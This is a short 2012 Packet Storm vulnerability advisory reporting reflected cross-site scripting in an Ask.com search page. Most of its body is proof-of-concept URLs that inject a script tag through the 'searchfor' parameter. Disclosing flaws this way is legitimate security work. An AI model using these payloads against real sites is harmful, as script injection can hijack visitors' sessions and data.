Ask.com Cross Site Scripting

2012-09-05T00:00:00
ID PACKETSTORM:116261
Type packetstorm
Reporter TayfunBasoglu
Modified 2012-09-05T00:00:00

Description

                                        
                                            `# Exploit Title: ASK XSS  
# Date: 05.00.2012  
# Author: TayfunBasoglu  
# Tested: BackTrack 5  
# Platform: jhtml  
------------------------------------------------------------------  
http://mws.ask.com/mywebsearch/AJmain.jhtml?searchfor=XSS  
<script>alert("TayfunBasoglu")</script>  
http://mws.ask.com/mywebsearch/AJmain.jhtml?searchfor="><script>alert("TayfunBasoglu")</script>  
------------------------------------------------------------------  
  
tayfunbasoglu.blogspot.com  
twitter.com/tayfunbasoglu   
  
`